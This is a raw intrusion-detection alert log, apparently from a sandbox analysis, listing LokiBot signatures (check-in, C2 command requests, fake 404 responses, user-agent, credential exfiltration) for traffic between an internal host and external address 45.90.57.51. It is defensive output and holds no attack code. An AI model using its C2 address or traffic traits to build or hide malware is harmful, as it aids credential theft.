05/16/24-00:37:30.052185	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49731	45.90.57.51	192.168.2.5
05/16/24-00:38:39.485062	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49768	80	192.168.2.5	45.90.57.51
05/16/24-00:37:31.431993	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.5	45.90.57.51
05/16/24-00:37:46.034175	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49739	45.90.57.51	192.168.2.5
05/16/24-00:37:51.232610	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.5	45.90.57.51
05/16/24-00:37:31.431993	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.5	45.90.57.51
05/16/24-00:36:58.862053	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49708	80	192.168.2.5	45.90.57.51
05/16/24-00:37:49.343817	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.5	45.90.57.51
05/16/24-00:36:56.970973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49707	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.151548	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.5	45.90.57.51
05/16/24-00:38:07.071740	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.5	45.90.57.51
05/16/24-00:36:56.970973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49707	80	192.168.2.5	45.90.57.51
05/16/24-00:37:27.656502	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.5	45.90.57.51
05/16/24-00:38:33.811515	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.5	45.90.57.51
05/16/24-00:37:27.656502	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.5	45.90.57.51
05/16/24-00:38:33.811515	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.5	45.90.57.51
05/16/24-00:37:43.623424	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49738	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.151548	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.5	45.90.57.51
05/16/24-00:37:14.907253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.5	45.90.57.51
05/16/24-00:37:14.907253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.333175	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.5	45.90.57.51
05/16/24-00:37:02.627302	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.045718	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.5	45.90.57.51
05/16/24-00:38:25.211849	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49761	80	192.168.2.5	45.90.57.51
05/16/24-00:38:15.699411	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.333175	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.020338	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.5	45.90.57.51
05/16/24-00:36:58.862053	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49708	80	192.168.2.5	45.90.57.51
05/16/24-00:37:21.133210	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49727	45.90.57.51	192.168.2.5
05/16/24-00:38:25.707920	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49761	45.90.57.51	192.168.2.5
05/16/24-00:37:17.315322	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49725	45.90.57.51	192.168.2.5
05/16/24-00:37:24.372670	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49728	45.90.57.51	192.168.2.5
05/16/24-00:38:28.951650	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49763	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.076784	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49706	80	192.168.2.5	45.90.57.51
05/16/24-00:37:51.232610	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.5	45.90.57.51
05/16/24-00:38:29.456072	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49763	45.90.57.51	192.168.2.5
05/16/24-00:38:31.400897	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49764	45.90.57.51	192.168.2.5
05/16/24-00:38:36.199531	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49766	45.90.57.51	192.168.2.5
05/16/24-00:37:51.232610	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.076784	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49706	80	192.168.2.5	45.90.57.51
05/16/24-00:37:55.010656	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.5	45.90.57.51
05/16/24-00:38:41.892700	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49769	45.90.57.51	192.168.2.5
05/16/24-00:37:11.574808	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49722	45.90.57.51	192.168.2.5
05/16/24-00:37:04.537805	TCP	2025381	ET TROJAN LokiBot Checkin	49711	80	192.168.2.5	45.90.57.51
05/16/24-00:38:30.894418	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.5	45.90.57.51
05/16/24-00:38:50.123310	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.020338	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49736	80	192.168.2.5	45.90.57.51
05/16/24-00:37:55.010656	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.5	45.90.57.51
05/16/24-00:38:27.085627	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.5	45.90.57.51
05/16/24-00:38:17.603710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.199755	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.5	45.90.57.51
05/16/24-00:38:27.085627	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.199755	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.151548	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.5	45.90.57.51
05/16/24-00:37:27.656502	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.5	45.90.57.51
05/16/24-00:37:37.130221	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49735	80	192.168.2.5	45.90.57.51
05/16/24-00:38:17.603710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.020338	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.5	45.90.57.51
05/16/24-00:38:28.951650	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.5	45.90.57.51
05/16/24-00:37:11.067189	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.430034	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.5	45.90.57.51
05/16/24-00:38:30.894418	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49764	80	192.168.2.5	45.90.57.51
05/16/24-00:36:52.383820	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49704	80	192.168.2.5	45.90.57.51
05/16/24-00:37:18.705946	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.5	45.90.57.51
05/16/24-00:37:25.750611	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.5	45.90.57.51
05/16/24-00:37:39.532388	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49736	45.90.57.51	192.168.2.5
05/16/24-00:38:05.694542	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49750	45.90.57.51	192.168.2.5
05/16/24-00:38:13.256185	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49755	45.90.57.51	192.168.2.5
05/16/24-00:37:37.130221	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.5	45.90.57.51
05/16/24-00:37:43.623424	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.5	45.90.57.51
05/16/24-00:37:53.120055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.5	45.90.57.51
05/16/24-00:38:53.898131	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.5	45.90.57.51
05/16/24-00:38:53.898131	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.5	45.90.57.51
05/16/24-00:37:43.623424	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.5	45.90.57.51
05/16/24-00:37:59.470457	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.548431	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49772	45.90.57.51	192.168.2.5
05/16/24-00:38:41.388891	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.5	45.90.57.51
05/16/24-00:37:02.627302	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49710	80	192.168.2.5	45.90.57.51
05/16/24-00:38:08.955748	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.5	45.90.57.51
05/16/24-00:38:10.859696	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.5	45.90.57.51
05/16/24-00:38:05.193094	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.5	45.90.57.51
05/16/24-00:38:12.750490	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.5	45.90.57.51
05/16/24-00:37:53.120055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.5	45.90.57.51
05/16/24-00:38:41.388891	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.170149	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49713	80	192.168.2.5	45.90.57.51
05/16/24-00:37:59.470457	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.5	45.90.57.51
05/16/24-00:38:20.039736	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49758	45.90.57.51	192.168.2.5
05/16/24-00:38:03.239293	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.5	45.90.57.51
05/16/24-00:36:56.970973	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49707	80	192.168.2.5	45.90.57.51
05/16/24-00:38:10.859696	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.5	45.90.57.51
05/16/24-00:38:25.211849	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.823352	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49733	45.90.57.51	192.168.2.5
05/16/24-00:37:57.099162	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.5	45.90.57.51
05/16/24-00:37:31.431993	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.5	45.90.57.51
05/16/24-00:38:05.193094	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.5	45.90.57.51
05/16/24-00:36:52.383820	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49704	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.170149	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49713	80	192.168.2.5	45.90.57.51
05/16/24-00:36:58.862053	TCP	2025381	ET TROJAN LokiBot Checkin	49708	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.356159	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.5	45.90.57.51
05/16/24-00:36:56.970973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.5	45.90.57.51
05/16/24-00:37:16.803035	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.5	45.90.57.51
05/16/24-00:38:35.693093	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.5	45.90.57.51
05/16/24-00:37:18.705946	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49726	80	192.168.2.5	45.90.57.51
05/16/24-00:37:29.556038	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.5	45.90.57.51
05/16/24-00:37:29.556038	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.5	45.90.57.51
05/16/24-00:38:37.577907	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49767	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.045718	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.5	45.90.57.51
05/16/24-00:38:35.693093	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.5	45.90.57.51
05/16/24-00:38:39.485062	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.5	45.90.57.51
05/16/24-00:37:16.803035	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.045718	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.5	45.90.57.51
05/16/24-00:37:20.628600	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.5	45.90.57.51
05/16/24-00:37:31.431993	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.000180	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.315004	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.333175	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.5	45.90.57.51
05/16/24-00:38:50.123310	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49773	80	192.168.2.5	45.90.57.51
05/16/24-00:37:59.470457	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.5	45.90.57.51
05/16/24-00:38:19.541569	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.5	45.90.57.51
05/16/24-00:38:25.211849	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.5	45.90.57.51
05/16/24-00:38:17.603710	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49757	80	192.168.2.5	45.90.57.51
05/16/24-00:37:31.431993	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.590961	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49706	45.90.57.51	192.168.2.5
05/16/24-00:37:51.232610	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.5	45.90.57.51
05/16/24-00:36:59.369699	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49708	45.90.57.51	192.168.2.5
05/16/24-00:37:57.099162	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.5	45.90.57.51
05/16/24-00:38:05.193094	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.5	45.90.57.51
05/16/24-00:38:53.898131	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49775	80	192.168.2.5	45.90.57.51
05/16/24-00:37:49.343817	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.5	45.90.57.51
05/16/24-00:37:57.099162	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.5	45.90.57.51
05/16/24-00:38:30.894418	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.5	45.90.57.51
05/16/24-00:38:53.898131	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.5	45.90.57.51
05/16/24-00:37:45.530428	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49739	80	192.168.2.5	45.90.57.51
05/16/24-00:38:03.750636	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49749	45.90.57.51	192.168.2.5
05/16/24-00:37:51.736667	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49743	45.90.57.51	192.168.2.5
05/16/24-00:37:55.510827	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49745	45.90.57.51	192.168.2.5
05/16/24-00:37:59.975323	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49747	45.90.57.51	192.168.2.5
05/16/24-00:38:30.894418	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.333175	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49760	80	192.168.2.5	45.90.57.51
05/16/24-00:37:02.627302	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.333175	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.5	45.90.57.51
05/16/24-00:37:14.907253	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.000180	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.5	45.90.57.51
05/16/24-00:37:33.315004	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.5	45.90.57.51
05/16/24-00:38:52.000180	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.5	45.90.57.51
05/16/24-00:38:33.811515	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49765	80	192.168.2.5	45.90.57.51
05/16/24-00:37:23.884685	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.5	45.90.57.51
05/16/24-00:37:23.884685	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.5	45.90.57.51
05/16/24-00:37:59.470457	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49747	80	192.168.2.5	45.90.57.51
05/16/24-00:38:15.699411	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.5	45.90.57.51
05/16/24-00:36:55.076784	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49706	80	192.168.2.5	45.90.57.51
05/16/24-00:37:05.048280	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49711	45.90.57.51	192.168.2.5
05/16/24-00:37:25.750611	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.5	45.90.57.51
05/16/24-00:37:25.750611	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.5	45.90.57.51
05/16/24-00:38:15.699411	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.5	45.90.57.51
05/16/24-00:37:49.343817	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.5	45.90.57.51
05/16/24-00:38:08.955748	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.5	45.90.57.51
05/16/24-00:38:07.071740	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.5	45.90.57.51
05/16/24-00:38:39.485062	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.5	45.90.57.51
05/16/24-00:38:43.272420	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49770	80	192.168.2.5	45.90.57.51
05/16/24-00:37:14.907253	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.5	45.90.57.51
05/16/24-00:38:33.811515	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.5	45.90.57.51
05/16/24-00:37:07.254938	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.5	45.90.57.51
05/16/24-00:38:09.462527	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49752	45.90.57.51	192.168.2.5
05/16/24-00:38:50.123310	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.5	45.90.57.51
05/16/24-00:38:43.272420	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.5	45.90.57.51
05/16/24-00:37:18.705946	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49726	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.696425	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49734	45.90.57.51	192.168.2.5
05/16/24-00:38:37.577907	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.5	45.90.57.51
05/16/24-00:38:45.647664	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49771	45.90.57.51	192.168.2.5
05/16/24-00:38:54.389626	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49775	45.90.57.51	192.168.2.5
05/16/24-00:37:43.623424	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.5	45.90.57.51
05/16/24-00:37:45.530428	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.5	45.90.57.51
05/16/24-00:37:04.537805	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49711	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.676041	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49713	45.90.57.51	192.168.2.5
05/16/24-00:36:54.264582	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49705	80	192.168.2.5	45.90.57.51
05/16/24-00:38:10.859696	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.5	45.90.57.51
05/16/24-00:37:04.537805	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49711	80	192.168.2.5	45.90.57.51
05/16/24-00:37:28.165565	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49730	45.90.57.51	192.168.2.5
05/16/24-00:36:54.264582	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49705	80	192.168.2.5	45.90.57.51
05/16/24-00:38:16.216451	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49756	45.90.57.51	192.168.2.5
05/16/24-00:37:11.067189	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.5	45.90.57.51
05/16/24-00:37:44.125784	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49738	45.90.57.51	192.168.2.5
05/16/24-00:37:12.990169	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.5	45.90.57.51
05/16/24-00:37:18.705946	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49726	80	192.168.2.5	45.90.57.51
05/16/24-00:37:41.744488	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.5	45.90.57.51
05/16/24-00:38:05.193094	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49750	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.170149	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49713	80	192.168.2.5	45.90.57.51
05/16/24-00:37:20.628600	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.5	45.90.57.51
05/16/24-00:37:53.120055	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.5	45.90.57.51
05/16/24-00:37:35.199755	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.356159	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.5	45.90.57.51
05/16/24-00:37:16.803035	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.5	45.90.57.51
05/16/24-00:37:47.452852	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.430034	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.5	45.90.57.51
05/16/24-00:37:29.556038	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.5	45.90.57.51
05/16/24-00:38:21.430034	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.5	45.90.57.51
05/16/24-00:38:35.693093	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.5	45.90.57.51
05/16/24-00:36:52.383820	TCP	2025381	ET TROJAN LokiBot Checkin	49704	80	192.168.2.5	45.90.57.51
05/16/24-00:38:12.750490	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49755	80	192.168.2.5	45.90.57.51
05/16/24-00:37:55.010656	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.5	45.90.57.51
05/16/24-00:38:27.085627	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.5	45.90.57.51
05/16/24-00:37:09.170149	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49713	80	192.168.2.5	45.90.57.51
05/16/24-00:38:01.356159	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.5	45.90.57.51
05/16/24-00:37:00.746100	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.5	45.90.57.51
05/16/24-00:38:03.239293	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49749	80	192.168.2.5	45.90.57.51
05/16/24-00:38:19.541569	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.5	45.90.57.51
05/16/24-00:38:23.839877	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49760	45.90.57.51	192.168.2.5
05/16/24-00:38:27.575264	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49762	45.90.57.51	192.168.2.5
05/16/24-00:37:53.120055	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.5	45.90.57.51
05/16/24-00:38:12.750490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.5	45.90.57.51
05/16/24-00:38:41.388891	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49769	80	192.168.2.5	45.90.57.51
05/16/24-00:37:26.257152	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49729	45.90.57.51	192.168.2.5
05/16/24-00:37:19.223879	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49726	45.90.57.51	192.168.2.5
05/16/24-00:38:37.577907	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.5	45.90.57.51
05/16/24-00:38:47.045718	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49772	80	192.168.2.5	45.90.57.51
05/16/24-00:37:00.746100	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.5	45.90.57.51
05/16/24-00:38:10.859696	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.5	45.90.57.51
05/16/24-00:38:25.211849	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.5	45.90.57.51
05/16/24-00:37:37.130221	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.5	45.90.57.51
05/16/24-00:37:13.504816	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49723	45.90.57.51	192.168.2.5
05/16/24-00:37:15.418885	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49724	45.90.57.51	192.168.2.5
